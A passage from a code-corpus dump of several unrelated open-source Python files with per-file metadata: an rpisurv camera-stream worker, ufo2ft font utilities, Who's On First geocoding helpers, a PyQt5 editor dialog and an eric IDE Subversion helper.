author, 'no_spurious_cast', 'One line description of no_spurious_cast.',
'Miscellaneous'),
]
| apache-2.0 | 1,694,754,521,614,532,400 | 28.416667 | 77 | 0.683664 | false |
SvenVD/rpisurv | surveillance/core/worker.py | 1 | 3534 | import time
import subprocess
import platform
import os
import shlex
import signal
from util.setuplogging import setup_logging
def worker(name,url,omxplayer_extra_options,coordinates,stopworker,aidx):
"""
Example substituted: ['/usr/bin/omxplayer', '--video_fifo', '1', '--video_queue', '1', '--live', '--timeout', '60', '--aidx', '-1', '-o', 'hdmi', 'rtsp://184.72.239.149:554/vod/mp4:BigBuckBunny_175k.mov', '--win', '960 0 1920 540', '--dbus_name', 'org.mpris.MediaPlayer2.cam_stream2']
"""
def start_subprocess(url,coordinates):
command_line='/usr/bin/omxplayer \
--video_fifo 1 \
--video_queue 1 \
--live \
--timeout 60 \
--aidx ' + str(aidx) + ' \
-o hdmi \
--threshold 0 \
' + ' ' + omxplayer_extra_options + ' ' + url + ' --win ' + '"' + " ".join(map(str,coordinates)) + '"' + ' --dbus_name org.mpris.MediaPlayer2.' + name
command_line_shlex=shlex.split(command_line)
logger.debug("Starting stream " + name + " with commandline " + str(command_line_shlex))
#The other process is just to be able to develop/simulate on a Windows or OSX machine
if platform.system() == "Windows":
proc=subprocess.Popen('echo this is a subprocess started with coordinates ' + str(coordinates) + '& ping 192.168.0.160 /t >NUL', shell=True)
elif platform.system() == "Linux":
proc=subprocess.Popen(command_line_shlex,preexec_fn=os.setsid,stdin=subprocess.PIPE)
else:
proc=subprocess.Popen('echo this is a subprocess started with coordinates ' + str(coordinates), shell=True)
return proc
def stop_subprocess(proc):
#The other process is just to be able to develop on a Windows or OSX machine
if platform.system() == "Windows":
proc.kill()
else:
            #This kills the process group, including all children
os.killpg(os.getpgid(proc.pid), signal.SIGKILL)
proc.wait()
#Ctrl-C handling
def signal_sigint_handler(signum,frame):
logger.info("Ctrl C was pressed")
stopworker.value = True
def signal_sigterm_handler(signum,frame):
logger.info("This process was sigtermed")
stopworker.value = True
signal.signal(signal.SIGINT, signal_sigint_handler)
signal.signal(signal.SIGTERM, signal_sigterm_handler)
#Logger setup
logger = setup_logging( "logs/" + name + ".log",__name__)
logger.debug("logger from " + name)
#Start stream and watchdog
attempts=0
proc=start_subprocess(url,coordinates)
logger.debug("stopworker.value = " + name + " " + str(stopworker.value))
while attempts < 100000 and stopworker.value == False:
#logger.debug("stopworker.value in loop = " + name + " " + str(stopworker.value))
if proc.poll() != None:
proc.communicate(input="\n")
proc=start_subprocess(url,coordinates)
attempts = attempts + 1
#Wait for omxplayer to crash, or not
time.sleep(10)
logger.info("Trying to restart " + name +" attempts:" + str(attempts))
else:
attempts=0
time.sleep(0.1)
#If we come to this point, we are instructed to kill this stream
logger.debug("This stream " + name + " is about to be stopped")
stop_subprocess(proc)
logger.info("This stream " + name + " has been stopped")
| gpl-2.0 | -9,006,318,421,546,378,000 | 44.307692 | 288 | 0.599887 | false |
team-vigir/vigir_behaviors | vigir_flexbe_states/src/vigir_flexbe_states/calculate_force_torque_calibration_state_test.py | 1 | 1925 | # Test the FT Calibration state by calling the python class and doing the calculation here
# Moritz Schappler, [email protected], 2015-05
# Institut fuer Regelungstechnik, Universitaet Hannover
# remotedebug
# import pydevd
# pydevd.settrace('localhost', port=5678, stdoutToServer=True, stderrToServer=True)
# import definitions
from calculate_force_torque_calibration_state import CalculateForceTorqueCalibration
from generate_trajectory_from_txtfile_state import GenerateTrajectoryFromTxtfileState
# initialize rospy and rostime
import rospy
rospy.init_node('calib_test_node', anonymous=True)
# define userdata
class Userdata(object):
def __init__(self):
self.trajectories = []
self.ft_calib_data = []
# Generating the trajectory from text files
# txtfile_name_left_arm = '~/ft_calib/input/l_arm.txt'
# txtfile_name_right_arm = '~/ft_calib/input/r_arm.txt'
txtfile_name_left_arm = '~/ft_calib/input/SI_E065_FT_Calib_Arms_Payload_Left.txt'
txtfile_name_right_arm = '~/ft_calib/input/SI_E065_FT_Calib_Arms_Payload_Right.txt'
transitiontime = 0.5
settlingtime = 0.5
userdata = Userdata()
GTFT = GenerateTrajectoryFromTxtfileState(txtfile_name_left_arm, txtfile_name_right_arm, transitiontime, settlingtime)
GTFT.execute(userdata)
# Calculate the calibration with data recorded with the behaviour
# bag_filename = '/home/schappler/ft_calib/ft_logs/FTCalib.bag'
# bag_filename = '/home/schappler/ft_calib/ft_logs/R05_both_20150426_w_flangue.bag'
# bag_filename = '/home/schappler/IRT_DRC/Experiments/Output/SI_E047_FT_Calib_Arms/S02_20150504_payload_merge.bag'
bag_filename = '~/ft_calib/ft_logs/SI_E065_FT_Calib_Arms_Payload.bag'
calibration_chain = ['left_arm', 'right_arm']
trajectories_command = GTFT._trajectories
CFTC = CalculateForceTorqueCalibration(bag_filename, calibration_chain, settlingtime, trajectories_command)
CFTC.execute(userdata)
print CFTC._ft_calib_data
| bsd-3-clause | -4,215,576,476,937,321,000 | 35.320755 | 118 | 0.772468 | false |
jamesgk/ufo2ft | Lib/ufo2ft/util.py | 1 | 14489 | # -*- coding: utf-8 -*-
from __future__ import print_function, division, absolute_import, unicode_literals
try:
from inspect import getfullargspec as getargspec # PY3
except ImportError:
from inspect import getargspec # PY2
from copy import deepcopy
from fontTools.misc.py23 import unichr
from fontTools import ttLib
from fontTools import subset
from fontTools import unicodedata
from fontTools.feaLib.builder import addOpenTypeFeatures
from fontTools.misc.transform import Identity, Transform
from fontTools.pens.reverseContourPen import ReverseContourPen
from fontTools.pens.transformPen import TransformPen
import logging
logger = logging.getLogger(__name__)
def makeOfficialGlyphOrder(font, glyphOrder=None):
""" Make the final glyph order for 'font'.
If glyphOrder is None, try getting the font.glyphOrder list.
    If no explicit glyphOrder is defined, sort glyphs alphabetically.
If ".notdef" glyph is present in the font, force this to always be
the first glyph (at index 0).
"""
if glyphOrder is None:
glyphOrder = getattr(font, "glyphOrder", ())
names = set(font.keys())
order = []
if ".notdef" in names:
names.remove(".notdef")
order.append(".notdef")
for name in glyphOrder:
if name not in names:
continue
names.remove(name)
order.append(name)
order.extend(sorted(names))
return order
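# --- Illustrative sketch added by the editor (not part of ufo2ft): any mapping
# with .keys() works as 'font' here, so a plain dict is enough to demonstrate
# that ".notdef" is forced to index 0 and the rest is sorted alphabetically.
def _example_official_glyph_order():
    fake_font = {"b": None, ".notdef": None, "a": None}
    return makeOfficialGlyphOrder(fake_font)  # ['.notdef', 'a', 'b']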
class _GlyphSet(dict):
@classmethod
def from_layer(cls, font, layerName=None, copy=False, skipExportGlyphs=None):
"""Return a mapping of glyph names to glyph objects from `font`."""
if layerName is not None:
layer = font.layers[layerName]
else:
layer = font.layers.defaultLayer
if copy:
self = _copyLayer(layer, obj_type=cls)
self.lib = deepcopy(layer.lib)
else:
self = cls((g.name, g) for g in layer)
self.lib = layer.lib
# If any glyphs in the skipExportGlyphs list are used as components, decompose
# them in the containing glyphs...
if skipExportGlyphs:
for glyph in self.values():
if any(c.baseGlyph in skipExportGlyphs for c in glyph.components):
deepCopyContours(self, glyph, glyph, Transform(), skipExportGlyphs)
if hasattr(glyph, "removeComponent"): # defcon
for c in [
component
for component in glyph.components
if component.baseGlyph in skipExportGlyphs
]:
glyph.removeComponent(c)
else: # ufoLib2
glyph.components[:] = [
c
for c in glyph.components
if c.baseGlyph not in skipExportGlyphs
]
# ... and then remove them from the glyph set, if even present.
for glyph_name in skipExportGlyphs:
if glyph_name in self:
del self[glyph_name]
self.name = layer.name if layerName is not None else None
return self
def _copyLayer(layer, obj_type=dict):
# defcon.Glyph doesn't take a name argument, ufoLib2 requires one...
try:
g = next(iter(layer))
except StopIteration: # layer is empty
return obj_type()
cls = g.__class__
if "name" in getargspec(cls.__init__).args:
def newGlyph(name):
return cls(name=name)
else:
def newGlyph(name):
# use instantiateGlyphObject() to keep any custom sub-element classes
# https://github.com/googlefonts/ufo2ft/issues/363
g2 = g.layer.instantiateGlyphObject()
g2.name = name
return g2
# copy everything except unused attributes: 'guidelines', 'note', 'image'
glyphSet = obj_type()
for glyph in layer:
copy = newGlyph(glyph.name)
copy.width = glyph.width
copy.height = glyph.height
copy.unicodes = list(glyph.unicodes)
copy.anchors = [dict(a) for a in glyph.anchors]
copy.lib = deepcopy(glyph.lib)
pointPen = copy.getPointPen()
glyph.drawPoints(pointPen)
glyphSet[glyph.name] = copy
return glyphSet
def deepCopyContours(
glyphSet, parent, composite, transformation, specificComponents=None
):
"""Copy contours from component to parent, including nested components.
    specificComponents: an optional list of glyph name strings. If not passed or
None, decompose all components of a glyph unconditionally and completely. If
passed, only completely decompose components whose baseGlyph is in the list.
"""
for nestedComponent in composite.components:
# Because this function works recursively, test at each turn if we are going to
# recurse into a specificComponent. If so, set the specificComponents argument
# to None so we unconditionally decompose the possibly nested component
# completely.
specificComponentsEffective = specificComponents
if specificComponentsEffective:
if nestedComponent.baseGlyph not in specificComponentsEffective:
continue
else:
specificComponentsEffective = None
try:
nestedBaseGlyph = glyphSet[nestedComponent.baseGlyph]
except KeyError:
logger.warning(
"dropping non-existent component '%s' in glyph '%s'",
nestedComponent.baseGlyph,
parent.name,
)
else:
deepCopyContours(
glyphSet,
parent,
nestedBaseGlyph,
transformation.transform(nestedComponent.transformation),
specificComponents=specificComponentsEffective,
)
# Check if there are any contours to copy before instantiating pens.
if composite != parent and len(composite):
if transformation == Identity:
pen = parent.getPen()
else:
pen = TransformPen(parent.getPen(), transformation)
# if the transformation has a negative determinant, it will
# reverse the contour direction of the component
xx, xy, yx, yy = transformation[:4]
if xx * yy - xy * yx < 0:
pen = ReverseContourPen(pen)
for contour in composite:
contour.draw(pen)
def makeUnicodeToGlyphNameMapping(font, glyphOrder=None):
""" Make a unicode: glyph name mapping for this glyph set (dict or Font).
Raises InvalidFontData exception if multiple glyphs are mapped to the
same unicode codepoint.
"""
if glyphOrder is None:
glyphOrder = makeOfficialGlyphOrder(font)
mapping = {}
for glyphName in glyphOrder:
glyph = font[glyphName]
unicodes = glyph.unicodes
for uni in unicodes:
if uni not in mapping:
mapping[uni] = glyphName
else:
from ufo2ft.errors import InvalidFontData
                raise InvalidFontData(
"cannot map '%s' to U+%04X; already mapped to '%s'"
% (glyphName, uni, mapping[uni])
)
return mapping
def compileGSUB(featureFile, glyphOrder):
""" Compile and return a GSUB table from `featureFile` (feaLib
FeatureFile), using the given `glyphOrder` (list of glyph names).
"""
font = ttLib.TTFont()
font.setGlyphOrder(glyphOrder)
addOpenTypeFeatures(font, featureFile, tables={"GSUB"})
return font.get("GSUB")
def closeGlyphsOverGSUB(gsub, glyphs):
""" Use the FontTools subsetter to perform a closure over the GSUB table
given the initial `glyphs` (set of glyph names, str). Update the set
in-place adding all the glyph names that can be reached via GSUB
substitutions from this initial set.
"""
subsetter = subset.Subsetter()
subsetter.glyphs = glyphs
gsub.closure_glyphs(subsetter)
def classifyGlyphs(unicodeFunc, cmap, gsub=None):
""" 'unicodeFunc' is a callable that takes a Unicode codepoint and
returns a string denoting some Unicode property associated with the
given character (or None if a character is considered 'neutral').
'cmap' is a dictionary mapping Unicode codepoints to glyph names.
'gsub' is an (optional) fonttools GSUB table object, used to find all
the glyphs that are "reachable" via substitutions from the initial
sets of glyphs defined in the cmap.
Returns a dictionary of glyph sets associated with the given Unicode
properties.
"""
glyphSets = {}
neutralGlyphs = set()
for uv, glyphName in cmap.items():
key = unicodeFunc(uv)
if key is None:
neutralGlyphs.add(glyphName)
else:
glyphSets.setdefault(key, set()).add(glyphName)
if gsub is not None:
if neutralGlyphs:
closeGlyphsOverGSUB(gsub, neutralGlyphs)
for glyphs in glyphSets.values():
s = glyphs | neutralGlyphs
closeGlyphsOverGSUB(gsub, s)
glyphs.update(s - neutralGlyphs)
return glyphSets
def unicodeInScripts(uv, scripts):
""" Check UnicodeData's ScriptExtension property for unicode codepoint
'uv' and return True if it intersects with the set of 'scripts' provided,
False if it does not intersect.
Return None for 'Common' script ('Zyyy').
"""
sx = unicodedata.script_extension(unichr(uv))
if "Zyyy" in sx:
return None
return not sx.isdisjoint(scripts)
def calcCodePageRanges(unicodes):
""" Given a set of Unicode codepoints (integers), calculate the
corresponding OS/2 CodePage range bits.
This is a direct translation of FontForge implementation:
https://github.com/fontforge/fontforge/blob/7b2c074/fontforge/tottf.c#L3158
"""
codepageRanges = set()
chars = [unichr(u) for u in unicodes]
hasAscii = set(range(0x20, 0x7E)).issubset(unicodes)
hasLineart = "┤" in chars
for char in chars:
if char == "Þ" and hasAscii:
codepageRanges.add(0) # Latin 1
elif char == "Ľ" and hasAscii:
codepageRanges.add(1) # Latin 2: Eastern Europe
if hasLineart:
codepageRanges.add(58) # Latin 2
elif char == "Б":
codepageRanges.add(2) # Cyrillic
if "Ѕ" in chars and hasLineart:
codepageRanges.add(57) # IBM Cyrillic
if "╜" in chars and hasLineart:
codepageRanges.add(49) # MS-DOS Russian
elif char == "Ά":
codepageRanges.add(3) # Greek
if hasLineart and "½" in chars:
codepageRanges.add(48) # IBM Greek
if hasLineart and "√" in chars:
codepageRanges.add(60) # Greek, former 437 G
elif char == "İ" and hasAscii:
codepageRanges.add(4) # Turkish
if hasLineart:
codepageRanges.add(56) # IBM turkish
elif char == "א":
codepageRanges.add(5) # Hebrew
if hasLineart and "√" in chars:
codepageRanges.add(53) # Hebrew
elif char == "ر":
codepageRanges.add(6) # Arabic
if "√" in chars:
codepageRanges.add(51) # Arabic
if hasLineart:
codepageRanges.add(61) # Arabic; ASMO 708
elif char == "ŗ" and hasAscii:
codepageRanges.add(7) # Windows Baltic
if hasLineart:
codepageRanges.add(59) # MS-DOS Baltic
elif char == "₫" and hasAscii:
codepageRanges.add(8) # Vietnamese
elif char == "ๅ":
codepageRanges.add(16) # Thai
elif char == "エ":
codepageRanges.add(17) # JIS/Japan
elif char == "ㄅ":
codepageRanges.add(18) # Chinese: Simplified chars
elif char == "ㄱ":
codepageRanges.add(19) # Korean wansung
elif char == "央":
codepageRanges.add(20) # Chinese: Traditional chars
elif char == "곴":
codepageRanges.add(21) # Korean Johab
elif char == "♥" and hasAscii:
codepageRanges.add(30) # OEM Character Set
# TODO: Symbol bit has a special meaning (check the spec), we need
# to confirm if this is wanted by default.
# elif unichr(0xF000) <= char <= unichr(0xF0FF):
# codepageRanges.add(31) # Symbol Character Set
elif char == "þ" and hasAscii and hasLineart:
codepageRanges.add(54) # MS-DOS Icelandic
elif char == "╚" and hasAscii:
codepageRanges.add(62) # WE/Latin 1
codepageRanges.add(63) # US
elif hasAscii and hasLineart and "√" in chars:
if char == "Å":
codepageRanges.add(50) # MS-DOS Nordic
elif char == "é":
codepageRanges.add(52) # MS-DOS Canadian French
elif char == "õ":
codepageRanges.add(55) # MS-DOS Portuguese
if hasAscii and "‰" in chars and "∑" in chars:
codepageRanges.add(29) # Macintosh Character Set (US Roman)
# when no codepage ranges can be enabled, fall back to enabling bit 0
# (Latin 1) so that the font works in MS Word:
# https://github.com/googlei18n/fontmake/issues/468
if not codepageRanges:
codepageRanges.add(0)
return codepageRanges
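# --- Illustrative sketch added by the editor (not part of ufo2ft): a character
# set containing ASCII plus U+00DE (Þ, Thorn) switches on bit 0 (Latin 1),
# matching the FontForge logic mirrored above.
def _example_codepage_ranges():
    unicodes = set(range(0x20, 0x7F)) | {0x00DE}  # ASCII range plus Thorn
    return calcCodePageRanges(unicodes)  # expected to include bit 0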
class _LazyFontName(object):
def __init__(self, font):
self.font = font
def __str__(self):
from ufo2ft.fontInfoData import getAttrWithFallback
return getAttrWithFallback(self.font.info, "postscriptFontName")
def getDefaultMasterFont(designSpaceDoc):
defaultSource = designSpaceDoc.findDefault()
if not defaultSource:
from ufo2ft.errors import InvalidDesignSpaceData
raise InvalidDesignSpaceData(
"Can't find base (neutral) master in DesignSpace document"
)
if not defaultSource.font:
from ufo2ft.errors import InvalidDesignSpaceData
raise InvalidDesignSpaceData(
"DesignSpace source '%s' is missing required 'font' attribute"
% getattr(defaultSource, "name", "<Unknown>")
)
return defaultSource.font
| mit | 224,002,478,724,119,800 | 35.559494 | 87 | 0.6118 | false |
whosonfirst/py-mapzen-whosonfirst-pip | mapzen/whosonfirst/pip/utils.py | 1 | 4464 | import mapzen.whosonfirst.pip
import mapzen.whosonfirst.uri
import mapzen.whosonfirst.placetypes
import shapely.geometry
import logging
import requests
import json
def reverse_geocoordinates(feature):
logging.warning("mapzen.whosonfirst.pip.utils.reverse_geocoordinates has been deprecated, you should use mapzen.whosonfirst.utils.reverse_geocoordinates instead")
props = feature['properties']
lat = props.get('reversegeo:latitude', None)
lon = props.get('reversegeo:longitude', None)
if not lat or not lon:
lat = props.get('lbl:latitude', None)
lon = props.get('lbl:longitude', None)
if not lat or not lon:
lat = props.get('geom:latitude', None)
lon = props.get('geom:longitude', None)
if not lat or not lon:
shp = shapely.geometry.asShape(feature['geometry'])
coords = shp.centroid
lat = coords.y
lon = coords.x
return lat, lon
# please rename me
# test with 18.48361, -77.53057
def whereami(feature, **kwargs):
raise Exception, "Please finish me"
def append_hierarchy_and_parent_pip(feature, **kwargs):
return append_hierarchy_and_parent(feature, **kwargs)
# https://github.com/whosonfirst/py-mapzen-whosonfirst-pip-utils/blob/f1ec12d3ffefd35768473aebb5e6d3d19e8d5172/mapzen/whosonfirst/pip/utils/__init__.py
def append_hierarchy_and_parent(feature, **kwargs):
props = feature['properties']
placetype = props['wof:placetype']
wofid = props.get('wof:id', None)
lat, lon = reverse_geocoordinates(feature)
parents = get_reverse_geocoded(lat, lon, placetype, **kwargs)
hierarchy = get_hierarchy(parents, wofid, placetype, **kwargs)
parent_id = get_parent_id(parents)
if len(parents) == 0:
logging.debug("Failed to reverse geocode any parents for %s, %s" % (lat, lon))
elif len(parents) > 1:
logging.debug("Multiple reverse geocoding possibilities %s, %s" % (lat, lon))
props['wof:parent_id'] = parent_id
props['wof:hierarchy'] = hierarchy
feature['properties'] = props
return True
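# --- Illustrative sketch added by the editor (not part of the original module):
# a caller holding a WOF GeoJSON feature dict could fill in its parent id and
# hierarchy like this; the data_root path is a made-up assumption.
def _example_append_hierarchy(feature):
    append_hierarchy_and_parent(feature, data_root="/usr/local/data/whosonfirst-data/data")
    props = feature["properties"]
    return props.get("wof:parent_id"), props.get("wof:hierarchy")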
def get_hierarchy(reverse_geocoded, wofid, placetype, **kwargs):
_hiers = []
data_root = kwargs.get('data_root', None)
remote_data_root = kwargs.get('remote_data_root', 'https://whosonfirst.mapzen.com/data/')
for r in reverse_geocoded:
id = r['Id']
if data_root != None:
pf = mapzen.whosonfirst.utils.load(data_root, id)
else:
rsp = requests.get(remote_data_root + mapzen.whosonfirst.uri.id2relpath(id))
pf = json.loads(rsp.content)
pp = pf['properties']
ph = pp['wof:hierarchy']
if len(ph) == 0:
logging.warning("parent (%s) returned an empty hierarchy so making a truncated mock" % id)
pt = pp['wof:placetype']
pt = "%s_id" % pt
ph = [ {pt: id} ]
for h in ph:
if wofid:
h[ "%s_id" % placetype ] = wofid
_hiers.append(h)
return _hiers
def get_parent_id(reverse_geocoded):
parent_id = -1
if len(reverse_geocoded) == 1:
parent_id = reverse_geocoded[0]['Id']
return parent_id
def get_reverse_geocoded(lat, lon, placetype, **kwargs):
# see also : https://github.com/whosonfirst/go-whosonfirst-pip#wof-pip-server
# if a user-specified pip_server is passed, use that; otherwise use pip_proxy
pip_server = kwargs.get('pip_server', None)
if not pip_server:
pip_proxy = mapzen.whosonfirst.pip.proxy()
pt = mapzen.whosonfirst.placetypes.placetype(placetype)
_rsp = []
parents = pt.parents()
logging.debug("feature is a %s, parents are %s" % (placetype, parents))
for parent in parents:
parent = str(parent)
# TO DO: some kind of 'ping' to make sure the server is actually
# there... (20151221/thisisaaronland)
logging.debug("reverse geocode for %s w/ %s,%s" % (parent, lat, lon))
try:
if pip_server:
rsp = pip_server.reverse_geocode(lat, lon, placetype=parent, exclude=["superseded", "deprecated"])
else:
rsp = pip_proxy.reverse_geocode(parent, lat, lon, exclude=["superseded", "deprecated"])
except Exception, e:
logging.debug("failed to reverse geocode %s @%s,%s" % (parent, lat, lon))
continue
if len(rsp):
_rsp = rsp
break
return _rsp
| bsd-3-clause | -1,172,968,554,941,506,600 | 27.615385 | 166 | 0.628136 | false |
arunkgupta/gramps | gramps/plugins/lib/maps/messagelayer.py | 1 | 5240 | # -*- python -*-
# -*- coding: utf-8 -*-
#
# Gramps - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2011-2012 Serge Noiraud
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# $Id$
#-------------------------------------------------------------------------
#
# Python modules
#
#-------------------------------------------------------------------------
import os
from gi.repository import GObject
import operator
from math import *
#------------------------------------------------------------------------
#
# Set up logging
#
#------------------------------------------------------------------------
import logging
_LOG = logging.getLogger("maps.messagelayer")
#-------------------------------------------------------------------------
#
# GTK/Gnome modules
#
#-------------------------------------------------------------------------
from gi.repository import Gdk
import cairo
#-------------------------------------------------------------------------
#
# Gramps Modules
#
#-------------------------------------------------------------------------
#-------------------------------------------------------------------------
#
# osmGpsMap
#
#-------------------------------------------------------------------------
try:
from gi.repository import OsmGpsMap as osmgpsmap
except:
raise
class MessageLayer(GObject.GObject, osmgpsmap.MapLayer):
"""
This is the layer used to display messages over the map
"""
def __init__(self):
"""
Initialize the layer
"""
GObject.GObject.__init__(self)
self.message = []
self.color = "black"
self.font = "Arial"
self.size = 18
#families = font_map.list_families()
def clear_messages(self):
"""
        reset the message list.
"""
self.message = []
def clear_font_attributes(self):
"""
reset the font attributes.
"""
self.color = "black"
self.font = "Arial"
self.size = 18
def set_font_attributes(self, font, size, color):
"""
Set the font color, size and name
"""
if color is not None:
self.color = color
if font is not None:
self.font = font
if size is not None:
self.size = size
def add_message(self, message):
"""
Add a message
"""
self.message.append(message)
def do_draw(self, gpsmap, ctx):
"""
        Draw the message lines over the map
"""
ctx.select_font_face(self.font,
cairo.FONT_SLANT_NORMAL,
cairo.FONT_WEIGHT_NORMAL)
ctx.set_font_size(int(self.size))
color = Gdk.color_parse(self.color)
ctx.set_source_rgba(float(color.red / 65535.0),
float(color.green / 65535.0),
float(color.blue / 65535.0),
0.9) # transparency
coord_x = 100
coord_y = int(self.size) # Show the first line under the zoom button
d_width = gpsmap.get_allocation().width
gpsmap.set_size_request(300,400)
d_width -= 100
for line in self.message:
line_to_print = line
(x_bearing, y_bearing, width, height, x_advance, y_advance) = ctx.text_extents(line_to_print)
while ( width > d_width ):
line_length = len(line_to_print)
character_length = int(width/line_length) + 1
max_length = int(d_width / character_length) - 1
while line_to_print[max_length] != ' ':
max_length -= 1 # cut the line at a new word
ctx.move_to(coord_x, coord_y)
ctx.show_text(line_to_print[:max_length])
line_to_print = line_to_print[max_length:]
(x_bearing, y_bearing, width, height, x_advance, y_advance) = ctx.text_extents(line_to_print)
coord_y += int(self.size) # calculate the next line position
ctx.move_to(coord_x, coord_y)
ctx.show_text(line_to_print)
coord_y += int(self.size) # calculate the next line position
ctx.stroke()
def do_render(self, gpsmap):
"""
render the layer
"""
pass
def do_busy(self):
"""
set the layer busy
"""
return False
def do_button_press(self, gpsmap, gdkeventbutton):
"""
When we press a button.
"""
return False
GObject.type_register(MessageLayer)
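# --- Illustrative sketch added by the editor (not part of Gramps): how a map
# view might attach this layer; 'osm' is assumed to be an osmgpsmap.Map owned
# by the calling view.
def _example_attach_message_layer(osm):
    layer = MessageLayer()
    layer.set_font_attributes("Arial", 14, "red")
    layer.add_message("Example message drawn over the map")
    osm.layer_add(layer)
    return layer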
| gpl-2.0 | -414,330,747,547,846,660 | 29.823529 | 109 | 0.489885 | false |
ax333l/QuoteBook | QuoteBook/editordialog.py | 1 | 4837 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'editordialog.ui'
#
# Created by: PyQt5 UI code generator 5.9.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Editor(object):
def setupUi(self, Editor):
Editor.setObjectName("Editor")
Editor.resize(400, 349)
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap("./icon.ico"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
Editor.setWindowIcon(icon)
Editor.setLocale(QtCore.QLocale(QtCore.QLocale.English, QtCore.QLocale.UnitedStates))
self.gridLayout = QtWidgets.QGridLayout(Editor)
self.gridLayout.setObjectName("gridLayout")
self.editCategory = QtWidgets.QLineEdit(Editor)
self.editCategory.setObjectName("editCategory")
self.gridLayout.addWidget(self.editCategory, 2, 1, 1, 1)
self.editTitle = QtWidgets.QLineEdit(Editor)
self.editTitle.setObjectName("editTitle")
self.gridLayout.addWidget(self.editTitle, 1, 1, 1, 1)
self.editQuote = QtWidgets.QTextEdit(Editor)
self.editQuote.setObjectName("editQuote")
self.gridLayout.addWidget(self.editQuote, 0, 1, 1, 1)
self.editAuthor = QtWidgets.QLineEdit(Editor)
self.editAuthor.setObjectName("editAuthor")
self.gridLayout.addWidget(self.editAuthor, 3, 1, 1, 1)
self.label = QtWidgets.QLabel(Editor)
self.label.setObjectName("label")
self.gridLayout.addWidget(self.label, 0, 0, 1, 1, QtCore.Qt.AlignHCenter)
self.horizontalLayout_6 = QtWidgets.QHBoxLayout()
self.horizontalLayout_6.setObjectName("horizontalLayout_6")
self.btnSave = QtWidgets.QPushButton(Editor)
self.btnSave.setObjectName("btnSave")
self.horizontalLayout_6.addWidget(self.btnSave)
self.btnCancel = QtWidgets.QPushButton(Editor)
self.btnCancel.setObjectName("btnCancel")
self.horizontalLayout_6.addWidget(self.btnCancel)
self.gridLayout.addLayout(self.horizontalLayout_6, 7, 1, 1, 1)
self.label_2 = QtWidgets.QLabel(Editor)
self.label_2.setObjectName("label_2")
self.gridLayout.addWidget(self.label_2, 1, 0, 1, 1, QtCore.Qt.AlignHCenter)
spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.gridLayout.addItem(spacerItem, 7, 0, 1, 1)
self.editCharacters = QtWidgets.QLineEdit(Editor)
self.editCharacters.setObjectName("editCharacters")
self.gridLayout.addWidget(self.editCharacters, 4, 1, 1, 1)
self.editDate = QtWidgets.QLineEdit(Editor)
self.editDate.setObjectName("editDate")
self.gridLayout.addWidget(self.editDate, 5, 1, 1, 1)
self.editTags = QtWidgets.QLineEdit(Editor)
self.editTags.setObjectName("editTags")
self.gridLayout.addWidget(self.editTags, 6, 1, 1, 1)
self.label_3 = QtWidgets.QLabel(Editor)
self.label_3.setObjectName("label_3")
self.gridLayout.addWidget(self.label_3, 2, 0, 1, 1, QtCore.Qt.AlignHCenter)
self.label_4 = QtWidgets.QLabel(Editor)
self.label_4.setObjectName("label_4")
self.gridLayout.addWidget(self.label_4, 3, 0, 1, 1, QtCore.Qt.AlignHCenter)
self.label_5 = QtWidgets.QLabel(Editor)
self.label_5.setObjectName("label_5")
self.gridLayout.addWidget(self.label_5, 4, 0, 1, 1, QtCore.Qt.AlignHCenter)
self.label_6 = QtWidgets.QLabel(Editor)
self.label_6.setObjectName("label_6")
self.gridLayout.addWidget(self.label_6, 5, 0, 1, 1, QtCore.Qt.AlignHCenter)
self.label_7 = QtWidgets.QLabel(Editor)
self.label_7.setObjectName("label_7")
self.gridLayout.addWidget(self.label_7, 6, 0, 1, 1, QtCore.Qt.AlignHCenter)
self.retranslateUi(Editor)
QtCore.QMetaObject.connectSlotsByName(Editor)
def retranslateUi(self, Editor):
_translate = QtCore.QCoreApplication.translate
Editor.setWindowTitle(_translate("Editor", "QuoteEdit"))
self.label.setText(_translate("Editor", "Quote"))
self.btnSave.setText(_translate("Editor", "Save"))
self.btnCancel.setText(_translate("Editor", "Cancel"))
self.label_2.setText(_translate("Editor", "Title"))
self.label_3.setText(_translate("Editor", "Category"))
self.label_4.setText(_translate("Editor", "Author"))
self.label_5.setText(_translate("Editor", "Characters"))
self.label_6.setText(_translate("Editor", "Date"))
self.label_7.setText(_translate("Editor", "Tags"))
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
Editor = QtWidgets.QDialog()
ui = Ui_Editor()
ui.setupUi(Editor)
Editor.show()
sys.exit(app.exec_())
| gpl-3.0 | 1,446,403,713,159,849,200 | 47.37 | 114 | 0.674385 | false |
paulmadore/Eric-IDE | 6-6.0.9/eric/Plugins/VcsPlugins/vcsPySvn/ProjectHelper.py | 1 | 24920 | # -*- coding: utf-8 -*-
# Copyright (c) 2005 - 2015 Detlev Offenbach <[email protected]>
#
"""
Module implementing the VCS project helper for Subversion.
"""
from __future__ import unicode_literals
import os
from E5Gui.E5Application import e5App
from VCS.ProjectHelper import VcsProjectHelper
from E5Gui.E5Action import E5Action
import UI.PixmapCache
class SvnProjectHelper(VcsProjectHelper):
"""
Class implementing the VCS project helper for Subversion.
"""
def __init__(self, vcsObject, projectObject, parent=None, name=None):
"""
Constructor
@param vcsObject reference to the vcs object
@param projectObject reference to the project object
@param parent parent widget (QWidget)
@param name name of this object (string)
"""
VcsProjectHelper.__init__(self, vcsObject, projectObject, parent, name)
def getActions(self):
"""
Public method to get a list of all actions.
@return list of all actions (list of E5Action)
"""
return self.actions[:]
def initActions(self):
"""
Public method to generate the action objects.
"""
self.vcsNewAct = E5Action(
self.tr('New from repository'),
UI.PixmapCache.getIcon("vcsCheckout.png"),
self.tr('&New from repository...'), 0, 0, self,
